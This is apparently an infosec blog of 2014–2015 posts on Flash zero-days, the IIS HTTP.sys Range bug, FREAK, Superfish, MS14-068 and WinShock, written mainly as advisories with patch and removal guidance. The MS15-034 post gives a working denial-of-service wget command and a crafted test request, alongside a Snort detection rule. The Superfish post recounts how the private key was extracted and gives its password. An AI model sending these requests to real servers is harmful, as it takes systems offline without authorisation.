ISSUES & INFOSEC

Flash Zero-Day – The Hacking Team

Posted by R.Dunne on July 11, 2015
Posted in: Flash Zero-Day. Tagged: , . Leave a comment

Yet another Flash Zero-Day released last night, again this exploit is coming from the data hackers obtained from breaching ‘The Hacking Team’.Adobe-Logo-psd64589

Previous issue: CVE-2015-5119 that affected Adobe Flash Player versions 9.0 through version 18.0.0.194.

All the data obtained from this breach has been made available on a Mirror site: https://ht.transparencytoolkit.org and now WikeLeaks : https://wikileaks.org/hackingteam/emails/emailid/45977 has also uploaded this data and made it easier to investigate by allowing users to search for Keywords.

I would think there could also be more on the way!

New Zero-Day: CVE-2015-5122

Affected software versions

Adobe Flash Player 18.0.0.203 and earlier versions for Windows and Macintosh
Adobe Flash Player 18.0.0.204 and earlier versions for Linux installed with Google Chrome
Adobe Flash Player Extended Support Release version 13.0.0.302 and earlier 13.x versions for Windows and Macintosh
Adobe Flash Player Extended Support Release version 11.2.202.481 and earlier 11.x versions for Linux

Adobe Security Bulletin

https://helpx.adobe.com/security/products/flash-player/apsa15-04.html

WikiLeaks Reference – New Zero-Day

https://wikileaks.org/hackingteam/emails/emailid/45977

Link to the New POC

http://pastebin.com/QiMumzqx

Link to the Old POC

http://pastebin.com/CcJQRxhy

POC

Public POC when ran in the Browser the exploit opens the Calc.exe on Windows.

Picture compliments of @dummys1337

Image

Updated

Now a new issue has been released CVE-2015-5123 again from The Hacking Team. FireEye actually caught this one and reported to Adobe.

Both 5122 and 5123 let malicious Flash files execute code on victims’ computers and install Malware. Present in the Windows, Linux and OS X builds of the plugin.

https://helpx.adobe.com/security/products/flash-player/apsa15-04.html

IIS server vulnerability (MS15-034)

Posted by R.Dunne on April 17, 2015
Posted in: IIS server vulnerability (MS15-034). Tagged: , , , , . Leave a comment

The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. Pic 5

Denial of Service (DoS) exploits are widely available to exploit CVE-2015-1635, a vulnerability in HTTP.sys, affecting Internet Information Server (IIS) . The patch was released on Tuesday (April 14th) as part of Microsoft’s Patch Tuesday.

CVE

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1635
KB Number 3042553
https://support.microsoft.com/en-us/kb/3042553
Summary
The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. The security update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Attack Vectors
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system.
Affected software Windows 7, Windows 8, Windows 8.1, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2
Also note this exploit works over SSL meaning it can used to bypass your IDS or other network protections.

DOS Exploit

Add the IP you desire to exploit where I have 127.0.0.1. Noted that this has to be a static file.

wget --header="Range: bytes=18-18446744073709551615" http://127.0.0.1/welcome.png

Pic 1

Results is the server is now unavailable.

Pic 2

Python Script to Test

Just change the IP inside the file and run within Python.

Pic 4

Results of the test.

Pic 3

Link to the file Link

Request Check

Send the following request to your IIS server:

GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615

If the server responds with “Requested Header Range Not Satisfiable”, then you may be vulnerable. Results may be inconclusive as Erratasec has stated.

“I suspect the biggest reason is that the “Range” header only is parsed when there is a static file being served. If a script generates the page, then it’ll ignore the range. I also suspect that virtual-hosting gets in the way — that unless the correct DNS name is provided, then it’ll reject the request.
Thus, the testing is inconclusive. While I can find some vulnerable responses, just because a server gives me some other response doesn’t mean it’s not also vulnerable. Thus, I can’t really say anything about the extent of the vulnerability.”

Snort Rule

alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: ” MS15-034 Range Header HTTP.sys Exploit”; content: “|0d 0a|Range: bytes=”; nocase; content: “-“; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)

OpenSSL Patches

Posted by R.Dunne on March 20, 2015
Posted in: OpenSSL Patches. Tagged: , . Leave a comment

openssl-logohttps://www.openssl.org/news/secadv_20150319.txt

Patches are now available for these issues.

The main issue CVE-2015-0291, which is a denial of service attack against a system running using OpenSSL 1.0.2. Not sure if many systems at this stage would be on that version but maybe there is.

  • If a client connects to an OpenSSL 1.0.2 server and renegotiates with an invalid signature algorithms extension, a NULL pointer dereference will occur. This can be exploited in a DoS attack against the server.
  • Exploit proof-of-concept code has not been published.

The other high issue is the Freak vulnerability and is recommended to upgrade to 1.0.1k, 1.0.0p, or 0.9.8zd depending on the starting version.

Other vulnerabilities listed are nine ranked moderate, and three low which are also older versions and these have been patched in newer versions.

UntitledReferences

Freak Attack – Factoring Attack

Posted by R.Dunne on March 5, 2015
Posted in: FreakAttack. Tagged: . Leave a comment

250px-IronMan-3Users of Apple and Google devices vulnerable to hacking when they visited millions of supposedly secure Web sites, including Whitehouse.gov, NSA.gov and FBI.gov.

Attack on RSA-EXPORT Keys vulnerability or CVE-2015-0204) is a newly-discovered flaw in SSL/TLS, the technology which is supposed to secure your communications across the net.

The attacker needs to perform a man in the middle so they can intercept communication between client and server. Attacker intercepts the initial TCP 3-way handshake between client and server, and injects some information that forces the server to downgrade security of communication, a session key using RSA 512 bits in length. The content of the communication, as they can be intercepted, can be decrypted offline, by cracking the key in about 7 hours with the appropriate hardware.

FREAK vulnerability is similar to last year’s POODLE flaw or Padding Oracle On Downgraded Legacy Encryption, which allowed hackers to downgrade the entire SSL/TLS Internet-communication security suite to the weakest possible version. FREAK affects only those SSL/TLS implementations that accept export versions of protocols that use the RSA encryption algorithm.

Apple responded to the FREAK vulnerability and released a statement that, “We have a fix in iOS and OS X that will be available in software updates next week.”

Impact

Enables hackers or intelligence agencies to force clients to use older, weaker encryption i.e. also known as the export-grade key or 512-bit RSA keys.List of some vulnerable clients below:

  • OpenSSL (CVE-2015-0204): versions before 1.0.1k are vulnerable.
  • Chrome: versions before 41 are vulnerable on some platforms. Upgrade to Chrome 41.
  • Android Browser: most versions are vulnerable. Use Chrome 41 instead.
  • Safari: a patch from Apple is in the process of getting deployed

FreakHow

The flaw resulted from a former U.S. government policy that forbade the export of strong encryption and required that weaker “export-grade” products be shipped to customers in other countries, say the researchers who discovered the problem. These restrictions were lifted in the late 1990s, but the weaker encryption got baked into widely used software that proliferated around the world and back into the United States, apparently unnoticed until this year.

Researchers discovered in recent weeks that they could force browsers to use the weaker encryption, then crack it over the course of just a few hours. Once cracked, hackers could steal passwords and other personal information and potentially launch a broader attack on the Web sites themselves by taking over elements on a page, such as a Facebook “Like” button.

The problem illuminates the danger of unintended security consequences at a time when top U.S. officials, frustrated by increasingly strong forms of encryption on smartphones, have called for technology companies to provide “doors” into systems to protect the ability of law enforcement and intelligence agencies to conduct surveillance.

What to do

Apple says it will be rolling out the update next week.

Android devices use another browser instead of the Default Android Browser.

Use https://freakattack.com/  to check if your browser is vulnerable.

Process

  • In the client’s Hello message, it asks for a standard ‘RSA’ ciphersuite.
  • The MITM attacker changes this message to ask for ‘export RSA’.
  • The server responds with a 512-bit export RSA key, signed with its long-term key.
  • The client accepts this weak key due to the OpenSSL/Secure Transport bug.
  • The attacker factors the RSA modulus to recover the corresponding RSA decryption key.
  • When the client encrypts the ‘pre-master secret’ to the server, the attacker can now decrypt it to recover the TLS ‘master secret’.
  • From here on out, the attacker sees plain text and can inject anything it wants.

References

SuperFish Adware- Lenovo

Posted by R.Dunne on February 20, 2015
Posted in: ISSUES & INFOSEC, SuperFish Adware- Lenovo. Tagged: , , , , , . Leave a comment

Overview663818811377980817

Lenovo Security Advisory:  LEN-2015-010

Potential Impact:  Man-in-the-Middle Attack

Severity:  High

Chris Palmer, a developer working for Google on Chrome, discovered that Lenovo delivers notebooks with the adware “Superfish” pre-installed. Research shows that it’s being pre-installed since at least September 2014, where a forums post about Superfish appeared.

This software acts as an SSL man-in-the-middle in order to collect data and inject ads into websites. This is accomplished seamlessly because SuperFish installs its certificate as a root certificate in the Windows root certificate store. The SuperFish root certificate is installed without any restrictions. Any certificate SuperFish generates will be validated unquestionably, as if it were issued by Microsoft itself. The pre-installed certificate is the exact same on all systems as it seems.

This means that malicious software signed with a SuperFish-generated certificate will also be implicitly trusted by the operating system. Should the SuperFish private key be extracted, which has already happened, anyone would be able to intercept the communications or generate valid software signatures for these computers.

Affect

Inserting a certificate at the factory in turn undermines any VPN, database, and software update connections all only to insert ads on secure shopping websites, basically hijacking every SSL session the laptop makes.

This can easily give way to attackers looking to breach the systems using the security flaws opened up by the software.

AdwareSimple Test

If you see an image with “YES” written on it, you have a problem. Do the test with all browsers installed.

(If the browser asks you to confirm/trust/accept with a pop-up it’s good: you’re not affected. But for the future consider that answering yes to those pop-ups is dangerous: you are giving up the security of the connection.)

https://filippo.io/Badfish/

Advisory

This advisory only applies to Lenovo Notebook products. (ThinkPad, ThinkCentre, Lenovo Desktop, ThinkStation, ThinkServer and System x products are not impacted.)

The following Lenovo notebooks may be affected:

Affected Products

The following Lenovo notebooks may be affected:

Adware1

Certificate Extracted – by Erratasec

Erratasec extracted the certificate from the SuperFish adware and cracked the password (“komodia“) that encrypted it.

Due to this an attacker can intercept any encrypted communications of SuperFish’s victims (people with Lenovo laptops) while hanging out near them at a cafe wifi hotspot. superfish

cert Process

  • Reverse engineered this by running the software in a debugger / IDApro, setting break point right after it decrypts itself.
  • Set the right break point before it actually infects your machine.
  • Ran this on a machine, infecting yourself, and run “procdump” in order to dump the process’s memory : procdump -am VisualDiscovery.exe super.dmp
  • Ran strings program that extracts human readable strings out of a binary file, discarding the rest. strings super.dmp > super.txt
  • Load the filetxt into a text editor and searched for the string “PRIVATE KEY”. It’s located several times in the memory dump.
  • Created his own password hacking too and  found the password in 10 seconds, “komodia”.
  • Successfully decoded the certificate and now has the ability to perform Man-in-the-Middle attacks on people with Lenovo’s.

Remove Software

  • Open the Windows Start menu or Start screen and search for Uninstall a program. Launch it.
  • Right-click Superfish Inc VisualDiscovery and select Uninstall. When prompted, enter your administrator password.

Remove Certificate

  • Open the Windows Start menu or Start screen and search for certmgr.msc. Right-click it and select Launch as Administrator.
  • Click Trusted Root Certification Authorities and open Certificates. Scroll down or use find to get to the Superfish, Inc. certificate. Right-click it and select Delete.

Remove From Firefox

  • Options/Preferences.
  • Advanced, then Certificates.
  • View Certificates.
  • Look for Superfish, Delete or Distrust.

Kerberos CVE-2014-068

Posted by R.Dunne on November 20, 2014
Posted in: Kerberos CVE-2014-068. Tagged: , , , , , , , , , , . Leave a comment

krblogoMicrosoft released a Patch Update MS14-068 related to CVE-2014-068, for an in-the-wild Kerberos exploit. Updates are recommended for Windows domain controllers to mitigate this Kerberos vulnerability.

Microsoft released update MS14-068 to address CVE-2014-6324.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6324

picTo check your system open up cmd.exe and use the following commands. If the patch is installed it will show in the results, if nothing appears in the results then the patch is not in place.

  • wmic qfe | find “KB3011780”
  • wmic qfe where HotFixID=”KB3011780″

PIC 1With this vulnerability it is possible for an attacker to forge a PAC that the Kerberos KDC would incorrectly validate. This allows an attacker to remotely elevate their privilege against remote servers from an unprivileged authenticated user to a domain administrator.

At the moment the exploit has not been shared online and metasploit has no exploit as of yet but as many attackers are working on exploits it may only be a matter of time.

The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain. An attacker with administrative privilege on a domain controller can make a nearly unbounded number of changes to the system that can allow the attacker to persist their access long after the update has been installed. Therefore it is critical to install the update.

pic1.gif-550x0This security update is rated Critical for all supported editions of Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2. The update is also being provided on a defense-in-depth basis for all supported editions of Windows Vista, Windows 7, Windows 8, and Windows 8.1.
Update Priority

  • Domain controllers running Windows Server 2008R2 and below
  • Domain controllers running Windows Server 2012 and higher
  • All other systems running any version of Windows

Possible to detect signs of exploitation pre-update. Examine event logs on suspected systems using the Event ID.

B26JDsAIgAAfUeu.png large 0574.pic2.png-550x0In this log entry is that the “Security ID” and “Account Name” fields do not match even though they should. In the screenshot above, the user account “nonadmin” used this exploit to elevate privileges to “TESTLAB\Administrator”.

References

WinShock – Bug

Posted by R.Dunne on November 13, 2014
Posted in: WinShock - Bug. Tagged: , , , . Leave a comment

Critical 19-Year Old Bug, every version of Microsoft Windows from Windows 95 onward.windows-hack

Attackers could exploit the bug to remotely control a PC, and so users are being urged to download updates.

Gavin Millard, from Tenable Network Security, “Is WinShock as bad as Heartbleed? At the moment, due to the lack of details and proof-of-concept code, it’s hard to say, but a remote code execution vulnerability affecting all versions of Windows server on a common component like Schannel is up there with the worst of them.”

It is unknown if the attack has been used against any Windows machines so far, the patch is now available,  but attackers may target the computers that have not yet been patched.

No patch for unsupported XP, even though some say the “Winshock” bug in Windows’ SSL/TLS installation is worse than Heartbleed.

Amichai Schulman, CTO of Imperva, said: “The advisory from Microsoft does not state that hosts running web servers are more vulnerable than others to this. It seems that while the same patch includes enhancement to the TLS ciphersuite list, this enhancement has nothing to do with the vulnerability being patched.

 “If this vulnerability is indeed exploitable via SSL / TLS it is more sever in nature than Heartbleed because this is a remote code execution vulnerability – it allows the attacker to completely take over the server (while Heartbleed attempted, opportunistically to collect sensitive information).”

Vulnerability in Schannel Could Allow Remote Code Execution

‘This security update resolves a privately reported vulnerability in the Microsoft Secure Channel (Schannel) security package in Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted packets to a Windows server.

This security update is rated Critical for all supported releases of Microsoft Windows.’

Secure Channel (Schannel)

The Secure Channel (Schannel) security package is a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols. These components are used to implement secure communications in support of several common internet and network applications, such as web browsing. Schannel is part of the security package that helps provide an authentication service to provide secure communications between client and server.

WinShock has been graded as 10 out of a possible 10 on the Common Vulnerability Scoring System (CVSS).

Publish Date : 2014-11-11

WinShock Pic 1WinShock Pic 3

 Affected Systems

WinShock Pic 2

No public claims of “exploits” for Winshock exist yet, its important that servers get patched before attackers are able to research and carry out the exploit.

Along with patching users should also update their IPS systems to deal with it.

Test Tool

Anexia-it/Winshock-test

References

http://www.cvedetails.com/cve/CVE-2014-6321/

http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows/#.VGU6ZfmsXk1

https://github.com/anexia-it/winshock-test